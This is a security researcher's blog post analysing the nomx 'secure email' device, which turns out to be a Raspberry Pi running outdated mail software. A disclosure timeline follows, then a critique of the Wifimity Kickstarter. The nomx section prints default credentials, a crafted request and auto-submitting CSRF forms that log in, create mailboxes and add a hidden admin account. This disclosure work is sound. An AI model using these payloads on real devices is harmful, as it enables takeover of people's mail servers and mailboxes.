nomx: The world’s most secure communications protocol

With permission, we have re-posted an article written by Scott Helme on what is possibly one of the weirdest things we’ve seen.

I was recently invited to take part in some research by BBC Click, alongside Professor Alan Woodward, to analyse a device that had quite a lot of people all excited. With slick marketing, catchy tag lines and some pretty bold claims about their security, nomx claim to have cracked email security once and for all. Down the rabbit hole we go!


You can find the official nomx site at and right away you will see how secure this device is.

nomx main site

Everything else is insecure.

The world’s most secure communications protocol

nomx ensures absolute privacy for personal and commercial email and messaging


That’s a lot of pretty big claims for such a small amount of space on the homepage so I was more than happy to get involved in investigating the device. I met with the BBC in London and they provided the retail packaged device that was to become mine for testing purposes. It’s pretty nice looking with some fancy packaging and you’d hope so too with a starting price of $199!

retail box

box open

Starting the investigation

Before I even powered the device on the first thing I wanted to do was open it up and see what was inside the case. If possible it’d be nice to take a backup of any flash storage or firmware on the device to have a backup that I could revert to if I break something and also a reference point of how the device was when I received it if needed. I flipped it over and started to open up the case expecting to find a fairly basic PCB inside. It had micro-USB for power and an Ethernet port on the side, with the box measuring 14cm x 14cm (5.5″ x 5.5″).

top view

micro-USB power

Ethernet port


Now, as soon as I looked at this device I already had a really bad feeling. First of all, through the vent holes on the top I could see that the PCB inside took up ~25% of the footprint of the device, the case was considerably larger than the PCB inside it, which seemed odd. Second, the MAC address on the bottom looked familiar, really familiar. Putting that little thought to the back of my mind I cracked open the case by removing the standard screws in the bottom to confirm my initial suspicion.

case open

raspberry pi

serial number

flashy lights

Turns out that MAC address was really familiar because the prefix is from the Raspberry Pi Foundation. They own the B8-27-EB assignment which you can search for on the IEEE website. Select ‘MAC Address Block Large (MA-L)’ from the drop down menu and filter on ‘Raspberry’.

mac address

To be clear, I have absolutely no problem with the Raspberry Pi at all, it’s an awesome little device and I’ve used it in a few projects of my own. I wasn’t however expecting to find one nestled in the corner of a large box that claims to provide a completely secure and proprietary email protocol! Because the device is just a Raspberry Pi under the hood that made taking a backup really easy. I simply popped out the Micro SD card and put it in my card reader and used Win32DiskImager to take a full clone of the card.

Firing up the device

Now I had a backup of the memory card I could go to town on the device itself and not worry about causing irreparable damage. In the worst case scenario I could always flash back to a stock image and start again without any problems. Knowing it was an rPi I grabbed a spare monitor and keyboard and decided to hook straight up to the device and boot it, I was pretty surprised when it started booting into Raspbian. Once I hit the login prompt I tried the default creds to no avail took a few shots at the root password too, no joy. It’s pretty easy to reset the root user password on an rPi though so I took the card out, tinkered with it on my PC and booted it back up again to a root shell.

pi booting up

logged in as root
Yes, there are a few things to be concerned about in those images but the main point is I had a root shell so I could reset the root user password and SSH in to the rPi from my main PC instead of using a crappy monitor and keyboard. I dropped my SSH key in there and also fired up WinSCP from my desktop to take a full dump of the OS contents to work with. The device was running Nginx so I wanted to look where the web root was to browse through the source and I also saw a couple of other programs starting on boot like dovecot and postfix. There were quite a few interesting things to look through!

Old software

I wanted to see exactly what was running on the device so I did a quick run down of the software that was installed and how it was configured, here’s the list of what I could find:

  • Raspbian GNU/Linux 7 (wheezy) – last updated 7th May 2015
  • nginx version: nginx/1.2.1 – released 5th June 2012
  • PHP 5.4.45-0+deb7u5 – released 3rd September 2015
  • OpenSSL 1.0.1t – released 3rd May 2016
  • Dovecot 2.1.7 – released 29th May 2012
  • Postfix 2.9.6 – released 4th February 2013
  • MySQL Ver 14.14 Distrib 5.5.52 – released 6th September 2016

It’s interesting to see such outdated versions of software on there, if the device was built even remotely recently I’m not sure how you’d end up with such seriously old versions installed. I had a look for any auto-update mechanism that I could find but couldn’t see anything on there. Perhaps the device will trigger some kind of update later when I go through the setup in the web interface so all may not be lost just yet. For now, it was interesting to know that everything on there seemed to be pretty standard for your everyday mail server, there were certainly no hints of anything proprietary.

Setup – Server

After my quick dig around at the command line I decided to open up the browser and go through the setup process. You have to get the IP of the device from your router or DHCP server and connect to it in the browser.

login screen

We can’t login just yet though as we don’t have an account on the device so we have to manually navigate to the Setup page…

setup page

Further down the setup page we can create our own ‘superadmin’ account and all we need is the setup password.

setup password

The only problem is I couldn’t find the setup password anywhere so I had to hit the lost password link. This prompts me to create a new setup password and then instructs me to edit a PHP file on the device and paste the password in there!

change the setup password

instructions to add the hash

Now, I’m not sure how someone is supposed to edit this PHP file right now because I can’t see the SSH instructions anywhere nor can I see the setup password anywhere either. To save you all the trouble I extracted the hash of the original password whilst I had SSH access and you can see it here:


It turns out this was pretty easy to break after I had a quick dig in the source to see how they generated the hash.

function generate_setup_password_salt() {  
    $salt = time() . '*' . $_SERVER['REMOTE_ADDR'] . '*' . mt_rand(0,60000);
    $salt = md5($salt);
    return $salt;

function encrypt_setup_password($password, $salt) {  
    return $salt . ':' . sha1($salt . ':' . $password);

Soooo, yeah. I also had a dig around in the config file and stumbled over this which is used during the setup process.

$CONF['min_password_length'] = 5;

Anyway, the main point for now was that I managed to crack the setup password, which was death, with a quick tweet asking for help or I could have set my own if I needed so I could create an account and login to the device.


With my ‘superadmin’ account created I could now begin the process of setting up my unhackable (not) email server. Interesting that my browser thinks the login page isn’t secure huh.

login screen

Once logged in the site is pretty barren and the only real option is to add my new domain that will be used for my email address.

logged in home screen

So I followed through the instructions and hit the ‘New Domain’ button where I was presented with the following screen.

create domain screen

I’ve no idea why the device can only support domains purchased through GoDaddy (I do) but I followed the instructions and purchased my domain, inserting the API keys into the screen as requested.

new domain details

At this point I won’t bore you with the rest of the terrible web interface but you setup a few mailboxes with credentials that can then be configured in your favourite mail client. Everything seems pretty darn standard for “The world’s most secure communications protocol”. The setup instructions also ask me to open a series of ports in my router and forward them to the nomx device:

  • port 26 / TCP
  • port 465 / TCP
  • port 587 / TCP
  • port 993 / TCP
  • port 995 / TCP

These must be the ports for their protocol! (Hint: these are standard email server ports) So, I decided to set my email account up in Thunderbird and sure enough, it didn’t work. I couldn’t for the life of me get this thing to work properly even just sending a basic email until I realised that they don’t ask you to open port 25 in the instructions which is required as the standard SMTP port! I will detail more on what port 26 is for later but once I opened up port 25 I could at least send and receive email. Well, I could almost send and receive email.

Setup – Client

I use Thunderbird as my local mail client so I got to work on adding my shiny new and super secure email address. It’s pretty easy going and just requires the usual parameters to setup an email address.

thunderbird setup

Everything looks good, but then something really unexpected happened that I just can’t explain. Contrary to the claims all over the nomx website, Thunderbird is throwing up some warnings telling me that the email server needs a security exception. Shocker.

security exception

The same thing also happens again when I try to send an email!

security exception

Spam Hammer

The only problem with trying to send an email from a dynamic, residential IP address (the default here in the UK) is that you look incredibly ‘spammy’. ISPs and email providers just don’t expect email to be sent from an IP like this and it’s often something that malware would do. As a result, it gets blocked. It doesn’t just go to the Spam Folder either, in a lot of cases the mail is rejected and sent back. This was exactly the case when I tried to send an email to my own Hotmail address and it was immediately returned.

notice from hotmail that mail was returnedThis is great news, I can’t send emails from my new super awesome secure email server to anyone with a Microsoft email account because they just return it. The story is pretty similar across the board with the email either being returned or put straight in the spam folder of the recipient. I tried against GMail and a few other large providers and found that not one of them made it to the inbox anywhere. After I got a few emails bounced I thought I’d check to see if my IP had been flagged yet and to my surprise it had already been placed on 3 blacklists!

ip blacklists

This really isn’t good unless you plan on constantly chasing your IP off blacklists or frequently changing your IP address to avoid it being blacklisted too widely. Certainly things we don’t want to be thinking about.

Dynamic DNS

The IP address point above got me thinking, changing my public IP at home can basically happen at any point, I can power cycle my router and get a new one if I like. This device must have some kind of mechanism to poll a DDNS provider and give me a host name that always resolves to my home address. I could see in the DNS that I had 2 A records set, mail and localmail, that I hadn’t set and one of them was my public IP and the other was the internal IP assigned to my nomx device (bit of an information leak?). I certainly hadn’t set these so it must have been done for me. I ran grep over the code that powers the web interface and couldn’t find any matches for the subdomains so I took a guess and dumped out the crontab of the root user which turned up something.

crontab entries

There was a script being run 60 seconds after the device boots and then again every 15 minutes which certainly sounds like a good candidate for a DDNS client! I dumped the script out which turned out to be a rather hacky python script. In short it did a few things:

  • Read in some config files from /var/nomx which listed public IP, domains etc…
  • Checked to see if current public IP and other variables matched those on disk.
  • If they don’t match it polls the GoDaddy API and sets/updates the DNS records.
  • It also configures some UFW rules to ensure the necessary ports are open.

So, those GoDaddy API tokens that we required earlier were so the device can use GoDaddy as a DDNS provider! I can’t begin to explain how wrong this so I’m not even going to try. It’s dreadful.

The Magic

The ‘trick up the sleeve’ of this device is the ability for 2 people that own one to perform a “handshake” between their devices to setup a secure connection.

To send to other nomx users who have secure accounts on their nomx PES, you will need to create, what we call, a handshake between your nomx device and the other nomx device. You can do this by entering the Public IP of the other nomx device and the email address or domain (if entire domain is hosted on other nomx device).


Now, providing the email address and public IP of the other device didn’t really seem like it was going to help us establish any kind of “handshake”. I was expecting perhaps some kind of out of band communication of a pre-shared key or token for verification but no, nothing. You simply enter the email/domain of the other person and their current IP address (that they have to find from somewhere).

handshake screen

Once I’ve entered those details I’m returned to the main screen where I now have an entry representing the “handshake” I just did.

the new handshake

The weird thing is that absolutely nothing happened on the network when I did this. Nothing. There was no outbound traffic of any kind, and yes I’ve tried it with valid details in the field, but I can also confirm that nothing happens by looking at the source code. Nothing happened when I did this because nothing was supposed to happen. The entire create-handshake.php file is only 64 lines of code long. Of those over 20 are white space or comments and there’s a few more for includes of the header/footer etc… The only thing of any significance that takes place in this file is that a new row is inserted into the database in the handshake table. Sure enough, I now had an entry in a table called handshake on the device.

handshake table dump

The only problem was after running grep over the code directory I couldn’t find any instances of where this is used other than when you create the handshake or when they are listed on the main page. None of the rest of the code makes reference to it. It did seem odd though that the default SMTP port is 25 and there was a reference here for port 26, which is listed in the nomx documentation as the port required “For nomx to nomx communication”. As I was already way on my way to believing this was just a bog standard web server installed on a raspberry pi inside a big case doing absolutely nothing fancy, I relied on some of my postfix knowledge and started to dig around in the postfix config directories. Inside /etc/postfix/mysql I did find a file called which contained the following.

user = postfixadmin  
password = death  
hosts =  
dbname = postfixadmin  
query = SELECT CONCAT(smtp,destination,port) FROM handshake WHERE domain = '%s'  

This appears to be doing something like what we want and is taking the smtp, destination and port columns and joining them together. Looking at my earlier output from the handshake table that’d give me something like smtp: which would mean it was sending emails to port 26 at the destination and not port 25. After running over the entire postfix directory with grep though I couldn’t find anywhere that this config file was mentioned, I would have expected to see it referenced in but no. To see what postfix was doing on port 26 I had a look at and sure enough, there was something defined for port 26.

smtp      inet  n       -       -       -       -       smtpd  
26        inet  n       -       -       -       -       smtpd  
  -o syslog_name=postfix/handshake
  -o smtpd_use_tls=yes
  -o smtpd_tls_security_level=encrypt
  -o smtpd_sasl_auth_enable=no
  -o smtpd_enforce_tls=yes
#  -o milter_macro_daemon_name=ORIGINATING
submission inet n       -       -       -       -       smtpd  
  -o syslog_name=postfix/endUser
  -o smtpd_tls_security_level=encrypt
  -o smtpd_sasl_auth_enable=yes
  -o smtpd_client_restrictions=permit_sasl_authenticated,reject
  -o milter_macro_daemon_name=ORIGINATING
smtps     inet  n       -       -       -       -       smtpd  
  -o syslog_name=postfix/smtps
  -o smtpd_tls_security_level=encrypt
  -o smtpd_tls_wrappermode=yes
  -o smtpd_sasl_auth_enable=yes
  -o smtpd_client_restrictions=permit_sasl_authenticated,reject
  -o milter_macro_daemon_name=ORIGINATING

So, it certainly looks like it’s doing something on port 26, although it looks like it’s doing a whole lot of nothing out of the ordinary. To try and solve it and provide conclusive proof, we setup 2 nomx devices and went through the handshake procedure. We then closed port 26 on the firewall and tried to send an email. If the device actually uses port 26 then the email will fail, if it uses port 25 it will send just fine. After testing this the email did fail to send so it does mean that it is sending to port 26, which is absolutely no benefit whatsoever. The other interesting point this raised was that the IP address is hard-coded into the database and never updates so as soon as the IP of the other party changes, everything will break.

Web app testing

The next item on my list was the web application and having access to the source code made this a whole lot easier to test. After a cursory skim I could see that it was vulnerable to XSS and CSRF in countless places. This alone presented a pretty significant risk given that the web interface is effectively used to control the mail server.

injecting marquee tags

With the ability to abuse CSRF you can carry out any action that is present in the web interface, which includes adding and removing domains, adding and deleting mailboxes and adding and configuring an SMTP mail relay… Just think about that one for a second. To prove the device was vulnerable to CSRF, beyond seeing there were no mitigations in the code, I fired up Fiddler and crafted a HTTP request to create a new mailbox with my session ID.

Cookie: PHPSESSID=39r4bb36385te1seds0dgtpt87  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 127


This created a new mailbox for and set the user credentials so I could now login to send and receive emails from this address. This means I can now create arbitrary mailboxes on your domain and then send and receive emails from them. That’s pretty devastating when I can create anything I want like sales@, billing@, ceo@ or any one of the countless and highly offensive names I can think of to then send emails from your domain. Of course, with the ability to create a mailbox comes the ability to delete a mailbox which I can also do with CSRF. Launching this attack is pretty easy and I create a basic page to provide my personal details for the handshake and could simply direct a nomx user there. If they want to setup a handshake they will view the page that contains my details, and the CSRF attack, and then login to their nomx device allowing for successful delivery. I wanted to take this one step further though and not have to have the user do anything at all. I wanted them to simply visit a page, even for a brief second, and have their device totally compromised. Turns out it wasn’t that hard…

Undocumented admin account

After delving into the database on the device and browsing through a few tables, I saw something that horrified me. There was another admin account alongside my own that I hadn’t created.

mysql> select * from admin;  
| username               | password                           | created             | modified            | active |
|      | $1$d2242313$UJ6TolBZXSQQvrXvlMZO2/ | 2015-10-10 18:31:30 | 2016-10-24 21:35:46 |      1 |
| | $1$7d33f257$qxWGsOPg1PX6Axu.NoNaK0 | 2017-03-13 17:24:05 | 2017-03-13 17:24:05 |      1 |

I extracted the hash and posted it to Twitter to see if I could crowd-source the input and it didn’t take very long for someone to come back to me with the answer.

The password was, quite literally, “password”. Sure enough I immediately opened up the web interface and I could indeed login with the username and the password password. I had full control of the device. This is inexplicably bad for more reasons than I care to list but coupled with the above CSRF attack I now don’t need to depend on the user to be logged in to the device to perform administrative functions, I can simply login to the device with these admin credentials and do anything I like. All this requires is two simple iframes on a page.

<script src="" integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8=" crossorigin="anonymous"></script>  
<form action="" method="POST" id="login" name="login">  
<input type="hidden" value="" name="fUsername" id="fUsername"/>  
<input type="hidden" value="password" name="fPassword" id="fPassword"/>  
<input type="submit" value="Login">  
$(document).ready(function(e) {
<script src="" integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8=" crossorigin="anonymous"></script>  
<form action="" method="POST" id="mailbox" name="mailbox">  
<input type="hidden" value="csrf" name="fUsername" id="fUsername"/>  
<input type="hidden" value="" name="fDomain" id="fDomain"/>  
<input type="hidden" value="password" name="fPassword" id="fPassword"/>  
<input type="hidden" value="password" name="fPassword2" id="fPassword2"/>  
<input type="hidden" value="csrf" name="fName" id="fName"/>  
<input type="hidden" value="on" name="fActive" id="fActive"/>  
<input type="hidden" value="on" name="fMail" id="fMail"/>  
$(document).ready(function(e) {
    setTimeout(function() {$('#mailbox').submit();},3000);

I owe a thanks to Paul for helping me perfect the payload here, I was tackling it the wrong way until he gave me this much easier solution. With these two iframes embedded on a page, if I were to visit that they would first authenticate me to the nomx device and then create a new mailbox of my choosing. I can then login to my brand new mail account on that domain and use it. You can also change the password of existing mailboxes because it doesn’t ask for the current password to change it, allowing me access to all of your emails. You can configure an outbound mail relay for the device to intercept future communications and a whole bunch more. All an attacker needs to do with this is know the IP of the nomx device. Given that you get the client IP address thanks to the WebRTC extension of HTML5, iterating through the rest of what is probably a class C address space is easy and can be done in a flash. Let’s not forget the nomx device also sets a localmail subdomain in DNS that contains the internal IP of the device! This is about as a bad as it can get and results in total compromise of the device for simply visiting a single webpage for a second or so, no user action required.

Update: Doing an update like this, prior to publication, is a little unusual because I’d normally just make the changes and not need to mention the update as the article isn’t finished yet. I’ve decided to add an “update” though to show you an interesting few steps in the process that I had to go through. I was a bit confused about how the whole setup process would work for a user receiving one of these devices, I had to extract and crack a hash to get it to work. I’ve seen poor documentation for new devices before, something that can be forgiven, but I soon learnt that my device didn’t come with any paper documentation and it turns out it should have. I got a copy of the paper documentation and started reading. It also didn’t mention the setup page anywhere because, as it turns out, you aren’t supposed to use it at all. Your username and password to login to the device are listed in the documentation and it’s so bad I had to scan a copy just to show you…

a scan of the quick start guide

So this admin account I’d found was actually supposed to be there!! Not only is this utterly ridiculous there’s also nothing prompting the user to change this password in the documentation nor are they required to change it on first login either. If the user never changes this password then you can use CSRF to attack the device with the default credentials. Aha, I hear you think, what if they do change the password! Well, it turns out that’s not a problem either…

Creating an undocumented admin account

As I mentioned further up the page, there was the setup.php file that I originally used to create my own account but now seems to be redundant given our default admin account. For my CSRF attack to be 100% reliable though, and work around the user possibly having changed their password (unlikely), I could just create my own admin account on the device via CSRF.

<script src="" integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8=" crossorigin="anonymous"></script>  
<form action="" method="POST" id="admin" name="admin">  
<input type="hidden" value="createadmin" name="form" id="form"/>  
<input type="hidden" value="death" name="setup_password" id="setup_password"/>  
<input type="hidden" value="" name="fUsername" id="fUsername"/>  
<input type="hidden" value="password" name="fPassword" id="fPassword"/>  
<input type="hidden" value="password" name="fPassword2" id="fPassword2"/>  
$(document).ready(function(e) {
    setTimeout(function() {$('#admin').submit();},1000);

This will now create me a brand new admin account on the nomx device that is completely undetectable to the end user as there is nowhere to view/edit admin accounts on the device. I can now use this admin account for any subsequent CSRF attacks and be sure that the credentials will work and allow me to authenticate. This allows for a full compromise of any nomx device by an external attacker via CSRF or a local attacker on the network can either authenticate with the default account or create themselves an admin account to login with…

Other issues

There were a few other issues I came across whilst testing this device, some of which would be simple to fix and others not so much.

  • There are no automatic updates configured anywhere on this device that I can find. It’s running hideously outdated software and there appears to be no mechanism to update it at all.
  • The device doesn’t setup and configure SPF, DKIM or DMARC, which a good email provider/server should do.
  • The Relay Settings page writes user input into a config file without any sanitisation. This config file is then read in by Postfix. At a minimum I’ve managed to corrupt the config so Postfix won’t start but perhaps there is an additional attack vector here.
  • The code is riddled with bad examples of how to do things and it seems was developed by one guy called ‘shawn’ whose name appears throughout. They narrowly avoided one persistent XSS vulnerability by stripping tags followed by the comment /* should we even bother? */.
  • There are a lot of edited and half baked files where the .php extension has been changed, presumably to stop them being visited in the browser. What this results in is the browser simply downloading the files instead.
  • The device uses self-signed certs throughout and they aren’t even device specific. It’s using the default ssl-cert-snakeoil.pem and ssl-cert-snakeoil.key in the Postfix config.
  • Their main company website has the themes default 404 page with links to download it and to the Gantry theme framework:
  • They also have a publicly accessible Joomla login, though I’ve not done any poking around here:
  • The device depends on the GoDaddy API to update its DNS record, if this changes or goes down/away then you have no mechanism to update DNS. There’s also the issue of the 1 hour DNS TTL when your IP changes which means emails don’t make it through for a short period.
  • The device only sets the 2 subdomains (mail and localmail) in DNS. With no MX record set it’d be wise to set an A record for the bare domain to help with external mail delivery too. Ideally they should just set an MX record…
  • Each user has a configured mailbox size of 10MB and without being able to SSH into the box you can’t change this. Good luck sending any attachments.
  • They have what looks like an old config file on the disk that contains what looks like genuine user credentials.[redacted]77  
  • The root user had various files containing things like the bash and mysql history in the home directory which contained several domains/emails of people who I assume helped to test the device.  
  • The file /var/mail/root contains notification emails going back almost 2 years.
  • There are several files in the web root that have bad extensions so can be directly downloaded in the browser.  
  • How could I not mention security headers! There are a few headers that really should be set here like CSP and XFO at a minimum. Setting others like XCTO and XXP certainly wouldn’t hurt either…
  • There are certain times when the box seems to throw 500 errors for no reason like when you try to access robots.txt, which doesn’t exist.

Is this a scam?

It would be very easy to conclude that this is a scam. The device is running standard mail server software running on a Raspberry Pi, most of which is outdated. They have presented at countless tech shows and can be constantly found making bold statements of ‘absolute security’ yet didn’t pick up a CSRF vulnerability in their web interface. Take this snippet for example:

We have things like “secure protocol and device”, this box is using SMTP with self-signed certificates… The “nomx network” and “absolute assurance”… As far as I can tell the company isn’t even eating their own dog food! You might not think they’d want to run some Raspberry Pi in a box in their office, but fear not, they also have a business solution.

business server

business server

On one of the pages on their site, that doesn’t seem like it’s intended to be public just yet (link), they also announce a $10,000 bounty!

bounty offer

Needless to say I will be buying one of those when they release it to claim the bitcoin, assuming the device doesn’t cost $10,000!

One good thing

The only good thing I can say about this product is that it does not create an MX record for your domain, upholding the “no MX” in the name. I’ve no idea why not having an MX record for your domain is a good thing, but, it doesn’t create one nonetheless. The python script that runs every 15 minutes only adds A records for mail and localmail, nothing else. Interestingly, the GoDaddy API client that they use doesn’t support MX records anyway, so I’m not sure if it was built around that limitation or it was a happy coincidence. This means of course that almost no email providers can send emails to you because there is no MX record, which is kind of how email works…

Disclosure Timeline

Following are the details for the disclosure timeline, all times GMT.

14 March 2017 19:22: Initial contact made with and from website.

14 March 2017 19:32: Response from asking for details.

15 March 2017 15:02: Skype call with Will to demo CSRF PoC and highlight various issues. Initially I was told this was a ‘client side issue’ and that I had a ‘problem with caching’ but assured him this was a genuine threat.

18 March 2017 18:10: No followup from Skype call so I emailed to confirm details. Advised I’d like to work to 30 day disclosure policy due to severity of issues.

19 March 2017 23:24: Email from Will advising he would get back to me “in the next couple of days”.

30 March 2017 18:39: No response from Will after 11 days so chased via email.

30 March 2017 22:28: Will claims to have a sent a response and has forwarded the same email to me again which doesn’t arrive.

31 March 2017 00:25: Will copies the text of the previous email into a new email which does arrive. Key points:

  • “We’ve started to update/upgrade/replace any nomx devices which may have been affected by this issue.”
  • “We’ve advised them that they should not use the nomx admin while surfing any other sites which contain malware or were otherwise compromised”
  • “We’ve already completed 100% of the initial notification effort and we are prepared to provide new nomx devices for any affected users free of charge.”
  • “We’ve also checked and, to date, there have been ZERO devices affected by this issue.”
  • “In appreciation, I’d also like to provide you personally with a new nomx device. Just send me your address. Alternatively, we can send you a new header file for the interface which prevents any potential CSRF.”
  • “As we developed and continue to develop nomx, we have had two of the largest security firms provide remote and “in hand” vulnerability assessments on nomx. We are providing them with your findings as well.”

31 March 2017 10:59: Replied to point out inconsistencies in email:

  • There is no apparent update mechanism, asked how to update my device.
  • Asked for a copy of the notification sent to consumers.
  • I’m unsure how they know “ZERO” devices are affected, asked for clarification and details of the investigation.
  • I gave consent for my details to be passed to the 2 penetration testing companies so that they could liaise directly with me if needed.
  • Address provided for shipping replacement device.
  • Asked why advice to not browse multiple sites given if CSRF has been patched.

31 March 2017 16:52: Asked for confirmation of receipt of earlier email given apparent email issues.

4 April 2017 11:13: Asked for confirmation of receipt of earlier email given apparent email issues.

4 April 2017 16:16: Will asked for “a few days” to respond.

11 April 2017 14:13: Will responded asking for a 30 day extension to the disclosure. He also said he would submit a CVE and “credit” me with the finding.

11 April 2017 14:19: I responded asking what the 30 day extension was required for as 100% of users had been notified and a patch or replacement device was available as per prior emails. Given the notification and advice provided the issue should already be considered public. Advised that unless there was a reason for the extension I would disclose as planned.

18th April 2017 12:44: Dan Simmons, Senior Producer of BBC Click, emailed Will to let him know that he would be covering it on the show and revealed that Alan and I were working with him. The email outlined all of our concerns and contained some questions from BBC Click.

20th April 2017 02:07: Will responded: “Thank you and I will be in touch in the next few days – and we can wrap this up.”

26th April 2017 15:00: Publication of this blog post. Outstanding points:

  • I have not yet had shipping confirmation of my new device, despite providing my address.
  • I have not yet received a copy of the notification sent to customers about the issue.
  • There has been no notice on their website or social media about the update/recall/replacement.
  • My device has not received any updates and is still vulnerable.
  • No details have been provided about their investigation to determine no devices were affected.
  • There has been no further response to myself or the BBC.

Additional Notes

It seems that Will has a patent pending for this device which you can read here. The introductory text seems to raise a few questions of its own.

They have various videos on YouTube that contain statements and assertions that raise a few questions: link linklink

You can catch the full details on BBC Click this weekend on the iPlayer!

I’ve published my full PoC code and the contents of the devices microSD card in a GitHub repo.

Wifimity compares itself to a 50-year old computer

Once again we find ourselves with a KickStarter (archive copy) that’s claiming wireless networks are the sole reason for why users find themselves compromised.
Wifimity” promises to produce a “cloak of invisibility” with a device that is “military security level” for at least €77–the campaigners are looking to raise €48,000, or $54,000 USD.

[Ed: You really ought to read their Kickstarter page, it is a right mess.]

Actually, it’s really two devices: one called “Safebox” which just stores your passwords with authorization via a fingerprint reader; and another called “Shield”, which does the same, but also acts as some sort of VPN tunnel. It is supposed to sit between your device and wireless access point, and it connects itself to a service that the creators operate.

We’re going to ignore the password-only device since it is plausibly functional, and instead focus on the Shield device, where the meat and potatoes are.

Here are some of the features they claim will come with Shield:

  • “anonymous surfing” – It’ll anonymize your IP via something that sounds a lot like NAT.
  • “device cloaking” – It’ll scrub the identifying info off your HTTP requests.  Their use case is device-specific price discrimination.
  • “DNS server” – It’ll blackhole suspicious websites’ IP addresses.  No mention of where they get their blacklist…
  • “anti-virus” – The KickStarter claims that this is still “under construction”.
  • “encrypt your cloud” – Their only substantive stretch goal, they promise the Shield will encrypt all the data you “upload to your cloud”.

This really seems like a keychain version of some previous KickStarters we’ve covered.

These claims are bonkers

We should start off by pointing out that the number of people affected by compromised wireless networks is minuscule, compared to the number affected by corporate or government breaches.

Adobe’s 2013 breach affected well over a hundred million people, Home Depot’s hit over 50 million credit cards, and Target had taken out about 40 million.  These are far larger than the total number of times in history that someone has been affected by an individual running Aircrack at Starbucks. This isn’t to say that compromised wireless networks are not a threat, but these frequent “wifi protector” KickStarters all come back to the notion that user wifi insecurity is interchangeable with anything the layman would identify as “hacking”.

Here’s something we’ve seen before (see Sever) that makes us wonder if and how it defies the laws of physics:

Faster Surf: With this option activated you can increase up to 50% your browsing speed.
Speed: It doesn’t reduce your device speed because it runs out of your mobile, tablet, or PC.

Now there are some possibilities for this claim; they could include the following:

  • It removes half of the content that makes a website slow to load. Website bloat is a real thing and just by having an ad blocker or turning on certain features within the browser, page loading does become faster. Where is it doing this processing?
  • It compresses and decompresses every single thing that comes in and out in addition to providing an encrypted tunnel. How is this possible with a device that, based on its housing, is probably nothing more than a basic ARM-based device running at low-power? They claim that it won’t slow down your PC either, so again, where is it doing this?
  • They have no idea what they’re talking about and have no specific plan as to how they would make everything faster.

The first one seems to be probable as they link to an article from the Wall Street Journal about tracking cookies. Their concern over “price discrimination” – that your Internet activity will lead to online stores increasing prices on you, insurance companies increasing fees, and banks raising interest rates – has some merit, but these issues can be solved by the typical user, by employing the tools included with every modern web broswer. There is no need to throw money at a €140 device when all of this can be done for free.

There are hints that maybe they really don’t know what they’re talking about, however; at the start of the KickStarter page, there’s a statement about AES reminiscent of’s DataGateKeeper:

“AES is the first (and only) publicly accessible cipher approved by the National Security Agency (NSA)..”

Really? I don’t suppose that they’ve heard of DES, have they? If you’re going to sell a cryptography product, it would be good to at least know a thing or two about the development of the algorithms.

More than 1,000,000 times the capacity of the Apollo 11 computer.

What do they mean by “capacity”? If we’re going to based on the storage capacity of the Apollo Guidance Computer (a computer that is 50 years old), which had 36 kilobytes of storage (in ROM), suggesting that it’s 1,000,000 times the capacity means that it has 34 GB of storage–let’s assume it’s 32 GB really. This is in no way a large amount of data by modern standards.

The specifications given for the device make no sense

Wifimity has provided a hypothetical specification for their keychain-sized device:

32 bits high speed microprocessor.
Cryptochip, high level security by hardware.
WiFi 2.4GHz chip or bluetooth BLE.
A battery 500mA with an intelligent charge system for long life.
A custom operative system (OS) to avoid hacking.

A 32-bit “high-speed microprocessor” is more or less the standard for devices these days (it’s later described to be a 32-bit ARM Cortex-based processor).  Their “cryptochip” appears to be a hardware implementation of AES, and 2.4 GHz wireless and Bluetooth are what I expect, but the rest of this just doesn’t hold water.

On the subject of cryptography, why is this using TLS 1.0? It’s vulnerable to both POODLE and BEAST. How was this overlooked? I guess this “custom [operating] system” that has been created to “avoid hacking” will take care of that problem right?

The cryptography doesn’t really make sense either considering this snapshot from one of the videos:

Screen Shot 2016-06-22 at 19.11.51

I can turn off encryption? I can turn off device cloaking and anonymizing options?

It gets weirder when you realise what the options at the top of the display webpage are for:

Screen Shot 2016-06-22 at 19.12.21

Oh wow. It just inserts a frame at the top? What’s the point of this device? Why is it not doing this passively? Does this mean that Facebook and other applications that do not make use of the mobile device’s browser do not get the same level of protection?

Nonsense. If we go back to the encryption part again, we see this gem as part of their stretch goals if they manage to achieve €250,000 in funding:

We keep a lot of important information in our cloud and this goal is to sure that it is safe and the all copies are unreadable in case we delete the cloud info.

So are they storing all your data on their own servers in cleartext unless they hit this stretch goal?  Or is this a clumsy restatement of their earlier claims about “encrypting your cloud”?

None of these features require a fancy device sitting between the user and a server to make it happen. In fact, this does nothing to solve the problem that the campaign seeks to resolve.

Who are these people?

As with previous exposés on this website, we like to document who’s leading these campaigns, as information on their backgrounds helps to discern between scammers and optimists. Unlike previous campaigns, there is very little information given on who’s behind it. This is evident in this passage:

Together with our team, we take our passion for innovation beyond our products and into every decision we make. In our product development process, simplifying people’s lives has always driven us at every stage. Simple products that can help people.

Pablo, our SEO, with several patents registered, has worked for more than 25 years in custom electronic projects. He has developed complex algorithms in collaboration with the mathematics department of UPV University and has made modems for GPRS, modems narrow band, and WiFi systems with encrypted solutions.

“Pablo” is actually “Pablo Jose Reig Gurrea”, CEO of Ladegar in Bilbao, Spain. His KickStarter profile is a bit more detailed:

Pablo is currently the CEO of Ladeger, company that develops technologic solutions for the consumer market. He graduated in Electronic engineering and worked more than 25 years in tailor-made solutions for industry, in British and German multinational companies. He has several patents registered and used to collaborate with the UPV university for developing algorithms and custom made solutions.

His prior work explains how he was able to build a demonstration device that appears to work as well as it does, but there is little to no evidence of his involvement in information security prior to this campaign. No website for his company appears to exist.

We get the impression however that Pablo is unsure of how his product will be assembled, as evident in this image:


But then it’s stated they’re still in negotiations over where it will be made:

We are in negotiations to manufacture in two plants, one in Albuquerque, USA for the American and Canadian market. “Made in USA.”

And the other in Bilbao, Spain for the European market. “Made in Europe.”

So it has gone from “will be” to “in negotiations”? Also, Canada would not permit “made in USA” just to be clear here.

We don’t expect this campaign to succeed.

Wifimity - Passwords & Surf Safe with Just a Key ring! -- Kicktraq Mini

MyDataAngel ends KickStarter and then feigns being a victim

